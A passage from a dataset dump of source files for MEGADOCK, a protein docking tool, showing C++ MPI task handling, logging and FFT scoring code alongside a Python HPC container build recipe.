argc,char *argv[],string &main_argv)\n// Procedure of options for system call version\n//============================================================================//\n{\n int iflag = 1;\n \n for( int i = 1 ; i < argc ; i++ ) {\n if( !strncmp(argv[i],\"-pg\",3) ) {\n main_argv = argv[++i];\n iflag = 0;\n }\n else if( !strncmp(argv[i],\"-tb\",3) ||\n !strncmp(argv[i],\"-ch\",3) ||\n !strncmp(argv[i],\"-lc\",3) ||\n !strncmp(argv[i],\"-ot\",3) ||\n !strncmp(argv[i],\"-rt\",3) ||\n !strncmp(argv[i],\"-wl\",3) ||\n !strncmp(argv[i],\"-lg\",3) ) {\n i++;\n }\n else {\n main_argv += ' ';\n main_argv += argv[i];\n }\n }\n \n return iflag;\n}\n\n//============================================================================//\nint Mpidp::for_worker(char *ctable,int argc2,char **wargv)\n// Preparation using function call version by workers\n//============================================================================//\n{\n string\tposition;\n string\ttstock;\n string\tsparam = _Param;\n char\t\ttag[5], *elem;\n \n //strcpy(_Name,strtok(ctable,\"\\t\"));\n position = \"$1\";\n tstock = strtok(ctable,\"\\t\");\n sparam = replace_pattern(sparam,position,tstock);\n \n for( int i = 1 ; i < _Ndata ; i++ ) {\n sprintf(tag,\"$%d\",i+1);\n position = tag;\n tstock = strtok(NULL,\"\\t\");\n \n // character is replaced\n sparam = replace_pattern(sparam,position,tstock);\n }\n \n char param[sparam.size()+1];\n //char *param = new char[sparam.size()+1];\n strcpy(param,sparam.c_str());\n strcpy(wargv[argc2++],strtok(param,\" \"));\n \n while( (elem = strtok(NULL,\" \")) ) {\n strcpy(wargv[argc2++],elem);\n }\n \n return argc2;\n}\n\n\n//============================================================================//\nstring Mpidp::replace_pattern(const string &pattern,const string &position,\n const string &option)\n// the pattern of a character is replaced \n//============================================================================//\n{\n string\tcommand;\n int\tpos_before = 0;\n int\tpos = 0;\n int\tlen = position.size();\n \n while( (pos = pattern.find(position, pos)) != std::string::npos) {\n command.append(pattern, pos_before, pos - pos_before);\n command.append(option);\n pos += len;\n pos_before = pos;\n }\n \n command.append(pattern, pos_before, pattern.size() - pos_before);\n \n return command;\n}\n\n//============================================================================//\nvoid Mpidp::request_tasks(const int &myid)\n//============================================================================//\n{\n MPI_Send(&myid, 1, MPI_INT, 0, 500, MPI_COMM_WORLD); // request num_of_tasks_per_request tasks\n int task_msg_size;\n MPI_Recv(&task_msg_size, 1, MPI_LONG, 0, 600, MPI_COMM_WORLD, &_Status); // receive task_msg_size\n _Table_list.resize(task_msg_size);\n MPI_Recv(_Table_list.data(), task_msg_size, MPI_CHAR, 0, 700, MPI_COMM_WORLD, &_Status); // receive tasks\n if (_Table_list[0] == 0) { // if received end of file message\n end_flag_on();\n }\n}\n" }, { "alpha_fraction": 0.40282002091407776, "alphanum_fraction": 0.4285319447517395, "avg_line_length": 32.49074172973633, "blob_id": "86a4c3b926cb85d93e2a9dc69166793e4a0b3106", "content_id": "495195e0fc35420a0ed351c4d5f27fb48f73ac99", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3617, "license_type": "permissive", "max_line_length": 272, "num_lines": 108, "path": "/megadock-scfa20/exec_logger.cpp", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : ExecLogger\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#include \"exec_logger.h\"\n\n//============================================================================//\nvoid ExecLogger::initialize()\n//============================================================================//\n{\n _cputime->initialize();\n\t\n mb = 0.0;\n\n#ifdef CUFFT\n devmem_free = 0;\n devmem_total = 0;\n devmem_use = 0;\n#endif\n\n _RLOut_file = \"\";\n _Num_fft_flag = 0;\n rec_filename = \"\";\n lig_filename = \"\";\n rec_max_size = 0.0;\n lig_max_size = 0.0;\n rec_voxel_size = 0.0;\n lig_voxel_size = 0.0;\n rec_num_grid = 0;\n lig_num_grid = 0;\n grid_width = 0.0;\n return;\n}\n\n//============================================================================//\nvoid ExecLogger::output(const int myid2)\n//============================================================================//\n{\n printf(\"# Output file = %s\\n\", _RLOut_file.c_str());\n if (!_Num_fft_flag) {\n printf(\"\\nReceptor = %s\\n\"\n \"Receptor max size = %f\\n\"\n \"Required voxel size = %f\\n\"\n \"Number of grid = %d\\n\"\n \"FFT N = %d\\n\"\n \"\\nLigand = %s\\n\"\n \"Ligand max size = %f\\n\"\n \"Required voxel size = %f\\n\"\n \"Number of grid = %d\\n\"\n \"FFT N = %d\\n\",\n rec_filename.c_str(),\n rec_max_size,\n rec_voxel_size,\n rec_num_grid,\n rec_num_grid * 2,\n lig_filename.c_str(),\n lig_max_size,\n lig_voxel_size,\n lig_num_grid,\n lig_num_grid * 2\n );\n\n } else {\n cout << \"\\nReceptor max size = \" << rec_max_size << endl;\n cout << \"Required voxel size = \" << rec_voxel_size << endl;\n cout << \"\\n(Receptor)\\n\";\n cout << \"Number of grid = \" << rec_num_grid << endl;\n cout << \"FFT N = \" << rec_num_grid*2 << endl;\n cout << \"Grid size = \" << grid_width << endl;\n cout << \"\\nLigand max size = \" << lig_max_size << endl;\n cout << \"Required voxel size = \" << lig_voxel_size << endl;\n cout << \"\\n(Ligand)\\n\";\n cout << \"Number of grid = \" << lig_num_grid << endl;\n cout << \"FFT N = \" << lig_num_grid*2 << endl;\n cout << \"Grid size = \" << grid_width << endl;\n }\n if ( mb < 1000 )\n printf(\"Memory requirement (/node) = %.1Lf MB\\n\",mb); // approximate value\n else \n printf(\"Memory requirement (/node) = %.1Lf GB\\n\",mb/1024); // approximate value\n\n#ifdef CUFFT\n printf(\"# GPU Memory : Use %3.1f MB (%4.1f%%), Free %3.1f MB (%4.1f%%), Total %3.1f MB\\n\",(float)devmem_use/1024.0/1024.0,(float)(100*devmem_use/devmem_total), (float)devmem_free/1024.0/1024.0, (float)(100*devmem_free/devmem_total), (float)devmem_total/1024.0/1024.0);\n#endif\n\n printf(\n \"\\n---------- Start docking calculations\\n\"\n \"\\nLigand = %s\\n\"\n \"Target receptors:\\n\"\n \" %s\\n\\n\", lig_filename.c_str(), rec_filename.c_str()\n );\n //if( !((ang+1)%nc) || _parameter->tem_flag1==1 ) {\n // printf(\" >Ligand rotation = %5d / %5d (%2d)\\n\",ang+1,_parameter->_Num_rot_angles,myid2);\n //}\n printf(\" Thread ID = %2d\\n\\n\",myid2);\n\n _cputime->output();\n}\n" }, { "alpha_fraction": 0.6063114404678345, "alphanum_fraction": 0.6326953172683716, "avg_line_length": 20.954545974731445, "blob_id": "92f4f4cc7f8d39245f1d331545ccab044e51fe05", "content_id": "06e28d83d82f46e44e6ae2c0259cd50fe8bc9fe8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1933, "license_type": "permissive", "max_line_length": 85, "num_lines": 88, "path": "/megadock_hpccm.py", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "\"\"\"\nHPC Base image\n\nContents:\n CentOS 7 (default)\n CUDA version 10.0 (default)\n Mellanox OFED version 4.6-1.0.1.1 ('ofed=True')\n Intel OPA driver/library (upstream, 'opa=True')\n GNU compilers (upstream)\n FFTW version 3.3.8 (default)\n OpenMPI version 3.1.3 (default)\n\"\"\"\n# pylint: disable=invalid-name, undefined-variable, used-before-assignment\n\n# userargs\nbase_image = USERARG.get('base', 'nvidia/cuda:10.0-devel-centos7')\nompi_version = USERARG.get('ompi', '3.1.3')\nfftw_version = USERARG.get('fftw', '3.3.8')\nofed_flag = USERARG.get('ofed', False)\nopa_flag = USERARG.get('opa', False)\n\n######\n# Devel stage\n######\n\n# base image\ndevel_image = base_image\n\nStage0.name = 'devel'\n\nStage0 += comment(__doc__, reformat=False)\n\nStage0 += baseimage(image=devel_image, _as='devel')\n\n# OFED\nif ofed_flag:\n Stage0 += mlnx_ofed(version='4.6-1.0.1.1')\n\n# Intel OPA\nif opa_flag:\n Stage0 += packages(\n yum=['numactl-libs', 'hwloc-libs', 'libfabric', 'libibverbs', 'infinipath-psm', \\\n 'opa-basic-tools', 'rdma-core', 'libpsm2', \\\n 'libhfil', 'libibverbs-devel', 'libsysfs-devel']\n )\n\n# MEGADOCK deps\nStage0 += packages(\n yum=['cuda-samples-10-0', 'ssh']\n)\n\n# GNU compilers\ncompiler = gnu()\nStage0 += compiler\n\n# FFTW\nStage0 += fftw(\n version=fftw_version, \n prefix='/usr/local/fftw',\n configure_opts=[\n '--enable-float',\n '--enable-sse2'\n ],\n toolchain=compiler.toolchain\n)\n\nOpenMPI_with_verbs = ofed_flag or opa_flag\n\n# OpenMPI\nStage0 += openmpi(\n version=ompi_version,\n prefix='/usr/local/openmpi',\n cuda=True, \n infiniband=OpenMPI_with_verbs,\n configure_opts=[\n '--enable-mpi-cxx'\n ],\n toolchain=compiler.toolchain\n)\n\n# MEGADOCK\nStage0 += copy(src='./megadock-scfa20', dest='/workspace')\nStage0 += copy(\n src='./Makefile',\n dest='/workspace/Makefile'\n)\n\nStage0 += shell(commands=['cd /workspace', 'make -j$(nproc)'])\n\n" }, { "alpha_fraction": 0.531929612159729, "alphanum_fraction": 0.5557242631912231, "avg_line_length": 38.35194778442383, "blob_id": "be4186771db989d7771d0ca89d659f3bb7ec0e07", "content_id": "7b7b2ae325626cea92d7be55d908cb2eda11084c", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 30301, "license_type": "permissive", "max_line_length": 215, "num_lines": 770, "path": "/megadock-scfa20/fft_process_table.cpp", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : FFTProcessTable\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#include \"fft_process_table.h\"\n\n#define NUM_THREADS 512 //should be power of 2\n\n#ifdef CUFFT\n\n#include \"cuda_kernel.h\"\n\n#endif\n\n//============================================================================//\nvoid FFTProcessTable::alloc_array(const int &num_fft)\n//============================================================================//\n{\n //cout << \"FFT::alloc_array |\" <<num_fft<< endl; cout.flush();\n _Num_fft = num_fft;\n\n const size_t nf3 = _Num_fft * _Num_fft * _Num_fft;\n const int num_sort = _parameter->_Num_sort;\n const int num_angle = _parameter->_Num_rot_angles;\n const int no = _parameter->_Num_output;\n const size_t nproc2 = _parallel->nproc2();\n int num_toprank;\n\n num_toprank = num_angle * num_sort;\n if( no > num_toprank ) num_toprank = no;\n\n alloc_fft();\n\n _Select.resize(num_sort);\n\n _Top.resize(num_toprank);\n\n //---------- memory allocation for _Current_rot_angle_num\n //_Current_rot_angle_num = new int[nproc2];\n\n _exec_logger->record_malloc( sizeof(float)*nf3*2*(1 + nproc2));\n\n //---------- memory allocation for _FFT_rec_r\n _FFT_rec_r = new float[nf3];\n if( !_FFT_rec_r ) {\n cerr << \"[ERROR] Out of memory. Number of listed receptors = (\"\n << nf3 << \") for (_FFT_rec_r) in fft_process.cpp!!\\n\";\n exit(1);\n }\n\n //---------- memory allocation for _FFT_rec_i\n _FFT_rec_i = new float[nf3];\n if( !_FFT_rec_i ) {\n cerr << \"[ERROR] Out of memory. Number of listed receptors = (\"\n << nf3 << \") for (_FFT_rec_i) in fft_process.cpp!!\\n\";\n exit(1);\n }\n\n return;\n}\n\n//============================================================================//\nvoid FFTProcessTable::alloc_fft()\n//============================================================================//\n{\n const int nf1 = _Num_fft;\n const size_t nf3 = _Num_fft * _Num_fft * _Num_fft;\n const size_t nproc2 = _parallel->nproc2();\n const int num_gpu = _parallel->num_gpu();\n const int na = _ligand->num_atoms();\n\n#ifdef CUFFT\n const int num_sort = _parameter->_Num_sort;\n const int ng1 = _Num_fft / 2;\n const int ng3 = ng1 * ng1 * ng1;\n const int nag = na * ng1;\n //for ligand voxelization on GPU\n const int nThreads = NUM_THREADS;\n const int nBlocks_nf3 = (nf3 + (nThreads-1)) / nThreads;\n\n CUFFTin_host = new cufftComplex[nf3];\n CUFFTout_host = new cufftComplex[nf3];\n\n _exec_logger->record_malloc( sizeof(cufftComplex)*nf3*2 ); //_in/outBuf\n\n //printf(\" start: %p\\n\",&CUFFTin_host[0].x);\n\n int lenCUFFTin_host = (int)(((long int)&CUFFTin_host[nf3-1].x) - ((long int)&CUFFTin_host[0].x) + sizeof(CUFFTin_host[nf3-1]))/sizeof(CUFFTin_host[nf3-1]);\n if(lenCUFFTin_host !=nf3) printf(\"# discontinuous memory allocation occurs\\n\");\n\n //printf(\" end: %ld\\n\",(long long int)&CUFFTin_host[nf3-1].y - &CUFFTin_host[0].x);\n\n int myid2 = omp_get_thread_num();\n cudaSetDevice(myid2 % num_gpu);\n checkCudaErrors( cudaStreamCreate(&_cuda_stream));\n cufft_result = cufftPlan3d(&cufft_plan, nf1, nf1, nf1, CUFFT_C2C);\n cufftSetStream(cufft_plan, _cuda_stream);\n\n checkCudaErrors( cudaMalloc((void **)&CUFFTin_gpu, sizeof(cufftComplex)*nf3) );\n checkCudaErrors( cudaMalloc((void **)&CUFFTout_gpu, sizeof(cufftComplex)*nf3) );\n checkCudaErrors( cudaMalloc((void **)&_FFT_rec_r_gpu, sizeof(float)*nf3) );\n checkCudaErrors( cudaMalloc((void **)&_FFT_rec_i_gpu, sizeof(float)*nf3) );\n\n checkCudaErrors( cudaMalloc((void **)&grid_r_gpu, sizeof(float)*ng3));\n checkCudaErrors( cudaMalloc((void **)&grid_i_gpu, sizeof(float)*ng3));\n checkCudaErrors( cudaMalloc((void **)&grid_coord_gpu, sizeof(float)*ng1));\n checkCudaErrors( cudaMalloc((void **)&radius_core2_gpu, sizeof(float)*na));\n checkCudaErrors( cudaMalloc((void **)&radius_surf2_gpu, sizeof(float)*na));\n checkCudaErrors( cudaMalloc((void **)&_Charge_gpu, sizeof(float)*na));\n checkCudaErrors( cudaMalloc((void **)&xd_gpu, sizeof(float)*nag));\n checkCudaErrors( cudaMalloc((void **)&yd_gpu, sizeof(float)*nag));\n checkCudaErrors( cudaMalloc((void **)&zd_gpu, sizeof(float)*nag));\n checkCudaErrors( cudaMalloc((void **)&atom_coord_rotated_gpu, sizeof(float)*na*3));\n checkCudaErrors( cudaMalloc((void **)&atom_coord_orig_gpu, sizeof(float)*na*3));\n checkCudaErrors( cudaMalloc((void **)&mole_center_coord_gpu, sizeof(float)*3));\n checkCudaErrors( cudaMalloc((void **)&ligand_rotation_angle_gpu, sizeof(float)*3));\n checkCudaErrors( cudaMalloc((void **)&top_score_gpu, sizeof(float)*nBlocks_nf3*num_sort) );\n checkCudaErrors( cudaMalloc((void **)&top_index_gpu, sizeof(int)*nBlocks_nf3*num_sort) );\n top_score_host = new float[nBlocks_nf3];\n top_index_host = new int[nBlocks_nf3];\n\n _exec_logger->record_malloc( sizeof(float)*nBlocks_nf3 + sizeof(int)*nBlocks_nf3 );\n\n cudaMemGetInfo(&(_exec_logger->devmem_free), &(_exec_logger->devmem_total));\n _exec_logger->devmem_use = _exec_logger->devmem_total - _exec_logger->devmem_free;\n\n#else\n\n _FFTWin = (fftwf_complex*) fftwf_malloc(sizeof(fftwf_complex)*nf3);\n _FFTWout = (fftwf_complex*) fftwf_malloc(sizeof(fftwf_complex)*nf3);\n\n plan_fftw_forward=fftwf_plan_dft_3d(nf1,nf1,nf1,_FFTWin,_FFTWout,FFTW_FORWARD,FFTW_ESTIMATE);\n plan_fftw_inverse=fftwf_plan_dft_3d(nf1,nf1,nf1,_FFTWin,_FFTWout,FFTW_BACKWARD,FFTW_ESTIMATE);\n\n _exec_logger->record_malloc( sizeof(fftwf_complex)*nf3*2 );\n\n#endif\n return;\n}\n\n//============================================================================//\nvoid FFTProcessTable::receptor_fft(float *grid_r,float *grid_i)\n//============================================================================//\n{\n const int num_grid= _Num_fft / 2;\n const size_t nf3 = _Num_fft * _Num_fft * _Num_fft;\n const int ndata = ( _Num_fft - num_grid ) / 2;\n const float theta = -2.0 * PI / _Num_fft;\n\n const int num_gpu = _parallel->num_gpu();\n const int nproc2 = _parallel->nproc2();\n\n if(num_gpu > 0) {\n#ifdef CUFFT\n int myid2 = omp_get_thread_num();\n struct timeval et1, et2;\n //memset(CUFFTin_host[0], make_cuComplex(0.0, 0.0), sizeof(cufftComplex)*nf3);\n for( int i = 0 ; i < nf3 ; i++ ) {\n CUFFTin_host[i] = make_cuComplex(0.0, 0.0);\n }\n\n for( int i = 0, m = 0 ; i < num_grid ; i++ ) {\n const int ic = _Num_fft*_Num_fft*(i+ndata);\n for( int j = 0 ; j < num_grid ; j++ ) {\n const int jc = ic + _Num_fft*(j+ndata);\n for( int k = 0 ; k < num_grid ; k++ ) {\n CUFFTin_host[jc+k+ndata] = make_cuComplex(grid_r[m ], grid_i[m]);\n m++;\n }\n }\n }\n\n cudaSetDevice(myid2 % num_gpu); //CUFFTin_dev[0] : [0] means 0th GPU\n\n gettimeofday(&et1,NULL);\n checkCudaErrors( cudaMemcpyAsync(CUFFTin_gpu, CUFFTin_host, sizeof(cufftComplex)*nf3, cudaMemcpyHostToDevice, _cuda_stream) );\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t6_data_transfer_rec += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n fft3d(theta); // [0] means performed on 0th GPU\n\n gettimeofday(&et1,NULL);\n checkCudaErrors( cudaMemcpyAsync(CUFFTout_host,CUFFTout_gpu,sizeof(cufftComplex)*nf3,cudaMemcpyDeviceToHost, _cuda_stream) );\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t6_data_transfer_rec += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n for( int i = 0 ; i < nf3 ; i++ ) {\n _FFT_rec_r[i] = cuCrealf(CUFFTout_host[i]);\n _FFT_rec_i[i] = cuCimagf(CUFFTout_host[i]);\n }\n\n gettimeofday(&et1,NULL);\n\n checkCudaErrors( cudaMemcpyAsync(_FFT_rec_r_gpu, _FFT_rec_r, sizeof(float)*nf3, cudaMemcpyHostToDevice, _cuda_stream) );\n checkCudaErrors( cudaMemcpyAsync(_FFT_rec_i_gpu, _FFT_rec_i, sizeof(float)*nf3, cudaMemcpyHostToDevice, _cuda_stream) );\n\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t6_data_transfer_rec += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n#endif\n } else {\n#ifndef CUFFT\n memset(_FFTWin, 0.0, sizeof(fftwf_complex)*nf3);\n\n for( int i = 0, m = 0 ; i < num_grid ; i++ ) {\n const int ic = _Num_fft*_Num_fft*(i+ndata);\n\n for( int j = 0 ; j < num_grid ; j++ ) {\n const int jc = ic + _Num_fft*(j+ndata);\n\n for( int k = 0 ; k < num_grid ; k++ ) {\n _FFTWin[jc+k+ndata][0] = grid_r[m ];\n _FFTWin[jc+k+ndata][1] = grid_i[m++];\n }\n }\n }\n\n fft3d(theta);\n\n for( int i = 0 ; i < nf3 ; i++ ) {\n _FFT_rec_r[i] = _FFTWout[i][0];\n _FFT_rec_i[i] = _FFTWout[i][1];\n }\n#endif\n }\n\n\n return;\n}\n\n#ifndef CUFFT\n//============================================================================//\nvoid FFTProcessTable::ligand_preparation(float *grid_r,float *grid_i)\n//============================================================================//\n{\n const int ng1 = _Num_fft / 2;\n const int nf2 = _Num_fft * _Num_fft;\n const size_t nf3 = _Num_fft * _Num_fft * _Num_fft;\n const int ndata = ( _Num_fft - ng1 ) / 2;\n \n memset(_FFTWin[0], 0.0, sizeof(fftwf_complex)*nf3);\n \n for( int i = 0, m = 0 ; i < ng1 ; i++ ) {\n const int ic = nf2*(i+ndata);\n\n for( int j = 0 ; j < ng1 ; j++ ) {\n int jc = ic + _Num_fft*(j+ndata);\n \n for( size_t k = 0, myijk=jc+ndata ; k < ng1 ; k++, myijk++ ) {\n _FFTWin[myijk][0] = grid_r[m ];\n _FFTWin[myijk][1] = grid_i[m++];\n }\n }\n }\n \n return;\n}\n\n//============================================================================//\nvoid FFTProcessTable::convolution()\n//============================================================================//\n{\n const int nf1 = _Num_fft;\n const int nf2 = nf1*nf1;\n const size_t nf3 = nf1*nf2;\n\n for( size_t i = 0, j=0 ; i < nf3 ; i++,j++ ) {\n _FFTWin[j][0] = _FFT_rec_r[i]*_FFTWout[j][0] + _FFT_rec_i[i]*_FFTWout[j][1];\n _FFTWin[j][1] = _FFT_rec_r[i]*_FFTWout[j][1] - _FFT_rec_i[i]*_FFTWout[j][0];\n }\n\n return;\n}\n#endif\n\n//============================================================================//\nvoid FFTProcessTable::fft3d(const float &theta)\n//============================================================================//\n{ \n const size_t nproc2 = _parallel->nproc2();\n const int num_gpu = _parallel->num_gpu();\n\n#ifdef CUFFT\n const int nf1 = _Num_fft;\n cufftHandle plan;\n cufftResult res;\n\n res = cufftPlan3d(&plan, nf1, nf1, nf1, CUFFT_C2C);\n cufftSetStream(plan, _cuda_stream);\n if(!res == CUFFT_SUCCESS) {\n cout << \"!fail to plan 3d FFT (DFT):\" << res << endl;\n exit(-1);\n }\n\n if( theta < 0.0 ) {\n res = cufftExecC2C(plan, CUFFTin_gpu, CUFFTout_gpu, CUFFT_FORWARD);\n } else {\n res = cufftExecC2C(plan, CUFFTin_gpu, CUFFTout_gpu, CUFFT_INVERSE);\n }\n\n if(!res == CUFFT_SUCCESS) {\n cout << \"!fail to exec 3d FFT(in fft3d()):\" << res << endl;\n exit(-1);\n }\n\n res = cufftDestroy(plan);\n#else\n struct timeval et3, et4;\n gettimeofday(&et3,NULL);\n if( _parameter->fft_library_type == 2 ) { \n } else {\n if( theta < 0.0 ) {\n fftwf_execute(plan_fftw_forward);\n } else {\n fftwf_execute(plan_fftw_inverse);\n }\n }\n gettimeofday(&et4,NULL);\n //printf(\" [FFT(host),%s] %10.5f\\n\\n\",((theta<0.0)?\"Forward\":\"Inverse\"),(et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6)));\n#endif\n\n return;\n}\n\n#ifndef CUFFT\n//============================================================================//\nvoid FFTProcessTable::score_sort()\n//============================================================================//\n{\n const int num_sort = _parameter->_Num_sort;\n const int nf2 = _Num_fft * _Num_fft;\n const int nf3 = _Num_fft * _Num_fft * _Num_fft;\n float temp_top_score;\n int temp_top_index;\n\n for( int i = 0 ; i < num_sort ; i++ ) {\n _Select[i].score = -99999.0;\n }\n\n fftwf_complex *fftout;\n fftout = _FFTWout;\n \n if(num_sort!=1) {\n for( size_t i = 0,myi= 0 ; i < nf3 ; i++,myi++ ) {\n const float raw = fftout[myi][0] / nf3;\n if( raw < _Select[num_sort-1].score) continue;\n for( int j = 0 ; j < num_sort ; j++ ) {\n if( raw > _Select[j].score ) {\n for( int k = num_sort-1 ; k > j ; k-- ) {\n _Select[k] = _Select[k-1];\n }\n _Select[j].score = raw;\n _Select[j].index[1] = i / nf2;\n _Select[j].index[2] = (i / _Num_fft) % _Num_fft;\n _Select[j].index[3] = i % _Num_fft;\n break;\n }\n }\n }\n } else { // num_sort = 1, take only 1 score per angle\n temp_top_score = 0.0;\n temp_top_index = 0;\n for( size_t i = 0, myi=0 ; i < nf3 ; i++,myi++ ) {\n const float raw = fftout[myi][0];\n if (temp_top_score < raw) {\n temp_top_score = raw;\n temp_top_index = i;\n }\n }\n _Select[0].score = temp_top_score / nf3;\n _Select[0].index[1] = temp_top_index / nf2;\n _Select[0].index[2] = (temp_top_index / _Num_fft) % _Num_fft;\n _Select[0].index[3] = temp_top_index % _Num_fft;\n }\n\n for( int i = 0 ; i < num_sort ; i++ ) {\n //printf(\" top %d %f\\n\",i,_Select[i].score);\n _Select[i].index[0] = _Current_rot_angle_num;\n }\n\n for( int i = 0 ; i < num_sort ; i++ ) {\n _Top[_Current_rot_angle_num*num_sort+i] = _Select[i];\n }\n\n return;\n}\n#endif\n\n#ifdef CUFFT\n//============================================================================//\nvoid FFTProcessTable::cuda_fft(float *grid_r,float *grid_i,float *grid_coord,float *atom_coord_rotated,float *theta, size_t myid2)\n//============================================================================//\n{\n const int nf1 = _Num_fft;\n const int nf2 = nf1 * nf1;\n const size_t nf3 = nf2 * nf1;\n const int num_gpu = _parallel->num_gpu();\n const size_t nproc2 = _parallel->nproc2();\n\n const int num_sort = _parameter->_Num_sort;\n const int na = _ligand->num_atoms();\n\n struct timeval et1, et2;\n struct timeval et3, et4;\n gettimeofday(&et1,NULL);\n\n float temp_top_score = -999999.0;\n int temp_top_index = -999999;\n\n const int nThreads = NUM_THREADS;\n const int nBlocks_nf3 = (nf3 + (nThreads-1)) / nThreads;\n if(nBlocks_nf3 * nThreads < nf3) {\n printf(\" nf3:%d, nBlocks_nf3:%d, nThreads:%d , nf3=nBlocks_nf3*nThreads\\n\",nf3,nBlocks_nf3,nThreads);\n fprintf(stderr, \" [ERROR] too large FFT size. nf3:%d, nBlocks_nf3:%d\\n\", nf3, nBlocks_nf3);\n exit(1);\n }\n\n cudaSetDevice(myid2 % num_gpu);\n //printf(\" #p10 [myid=%d]\\n\",myid2);\n\n ligand_voxelization_on_gpu(theta,myid2);\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t3_1_ligand_voxelization += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n gettimeofday(&et1,NULL);\n\n cufft_result = cufftExecC2C(cufft_plan, CUFFTin_gpu, CUFFTout_gpu, CUFFT_FORWARD);\n if(!cufft_result == CUFFT_SUCCESS) {\n cout << \"!fail to exec 3d FFT (DFT, Lig):\" << cufft_result << endl;\n exit(-1);\n }\n\n //*/\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t3_2_fftprocess_ligand_fft += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n gettimeofday(&et1,NULL);\n convolution_gpu<<<nBlocks_nf3, nThreads, 0, _cuda_stream>>>(nf3, _FFT_rec_r_gpu, _FFT_rec_i_gpu, CUFFTout_gpu, CUFFTin_gpu);\n\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t3_3_fftprocess_convolution += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n gettimeofday(&et1,NULL);\n\n cufft_result = cufftExecC2C(cufft_plan, CUFFTin_gpu, CUFFTout_gpu, CUFFT_INVERSE);\n if(!(cufft_result == CUFFT_SUCCESS)) {\n cout << \"!fail to exec 3d FFT (IDFT):\" << cufft_result << endl;\n exit(-1);\n }\n //*\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t3_4_fftprocess_fft_inverse += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n gettimeofday(&et1,NULL);\n\n // Search max score translation position from CUFFTout_gpu[nf3]\n\n //printf(\" t=%d per angle\\n\",num_sort);\n\n for( int i = 0 ; i < num_sort ; i++ ) {\n _Select[i].score = -99999.0;\n }\n\n max_pos_single<<<nBlocks_nf3, nThreads, sizeof(float)*nThreads, _cuda_stream>>>(nf3, CUFFTout_gpu, top_score_gpu, top_index_gpu);\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n\n gettimeofday(&et3,NULL);\n checkCudaErrors( cudaMemcpyAsync(top_score_host,top_score_gpu,sizeof(float)*nBlocks_nf3,cudaMemcpyDeviceToHost, _cuda_stream) );\n checkCudaErrors( cudaMemcpyAsync(top_index_host,top_index_gpu,sizeof(int)*nBlocks_nf3,cudaMemcpyDeviceToHost, _cuda_stream) );\n gettimeofday(&et4,NULL);\n _exec_logger->_cputime->t6_data_transfer_in_loop += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n checkCudaErrors( cudaStreamSynchronize(_cuda_stream) );\n\n if(num_sort!=1) {\n for(int i=0; i<nBlocks_nf3; i++) {\n if(top_index_host[i]/nf2 > nf1 || top_index_host[i] < 0){\n top_score_host[i] = -99999.99;\n //printf(\" error, %d | score, %f \\n\", top_index_host[i]/nf2, top_score_host[i]);\n }\n const float raw = top_score_host[i];\n if( raw < _Select[num_sort-1].score) continue;\n for( int j = 0 ; j < num_sort ; j++ ) {\n if( raw > _Select[j].score ) {\n for( int k = num_sort-1 ; k > j ; k-- ) {\n _Select[k] = _Select[k-1];\n }\n const int index = top_index_host[i];\n _Select[j].score = raw;\n _Select[j].index[1] = index / nf2;\n _Select[j].index[2] = (index / _Num_fft) % _Num_fft;\n _Select[j].index[3] = index % _Num_fft;\n break;\n }\n }\n }\n\n } else { // num_sort = 1, select only 1 score per 1 ligand angle\n for(int i=0; i<nBlocks_nf3; i++) {\n if(top_index_host[i]/nf2 > nf1 || top_index_host[i] < 0){\n top_score_host[i] = -99999.99;\n //printf(\" error, %d | score, %f \\n\", top_index_host[i]/nf2, top_score_host[i]);\n }\n if(temp_top_score < top_score_host[i]) {\n temp_top_score = top_score_host[i];\n temp_top_index = top_index_host[i];\n }\n }\n\n //printf(\" m:%f\\n\\n\",temp_top_score);\n //printf(\"%g (%d) [%d %d %d]\\n\", temp_top_score, _p, temp_top_index/(n*n),(temp_top_index/n)%n, temp_top_index%n );\n //printf(\"<%d> %g (%d/%d) %d\\n\", nBlocks,temp_top_score, temp_top_index, nf3, 